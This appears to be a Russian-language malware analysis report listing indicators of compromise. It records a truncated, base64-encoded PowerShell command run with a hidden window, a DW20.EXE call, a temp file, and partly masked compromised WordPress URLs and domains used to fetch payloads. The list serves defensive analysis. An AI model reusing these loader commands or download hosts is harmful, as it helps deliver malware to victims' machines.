Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHcAZABmAHIAbwB1AGUAbgBpAD0AJwBUAGgAcQB4AG4AawBmAHUAJwA7ACQAQwB2AHgAYQBiAGUAYgBhAG8AdQBzAHMAYQAgAD0AIAAnADcAMwA5ACcAOwAkAFIAdQBxAHQAbwBuAGwAYwBjAHcAeABtAD0AJwBQAHQAaABpAHEAawBzAHgAZQBpAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1980
- %TEMP%\905804.cvr
- 'tx####.50cms.com':80
- 'ma####yohiyo.com':80
- 'wq###.50cms.com':80
- http://tx####.50cms.com/wp-admin/l0yg3j3l-pggp7p80-519/
- http://ma####yohiyo.com/wp-admin/xwTaSd/
- http://wq###.50cms.com/addons/xrxUPWg/
- DNS ASK ye###auty.top
- DNS ASK el######.##signlandwebsolutions.online
- DNS ASK tx####.50cms.com
- DNS ASK ma####yohiyo.com
- DNS ASK wq###.50cms.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHcAZABmAHIAbwB1AGUAbgBpAD0AJwBUAGgAcQB4AG4AawBmAHUAJwA7ACQAQwB2AHgAYQBiAGUAYgBhAG8AdQBzAHMAYQAgAD0AIAAnADcAMwA5ACcAOwAkAFIAdQBxAHQAbwBuAGwAYwBjAHcAeABtAD0AJwBQAHQAaABpAHEAawBzAHgAZQBpAH...' (со скрытым окном)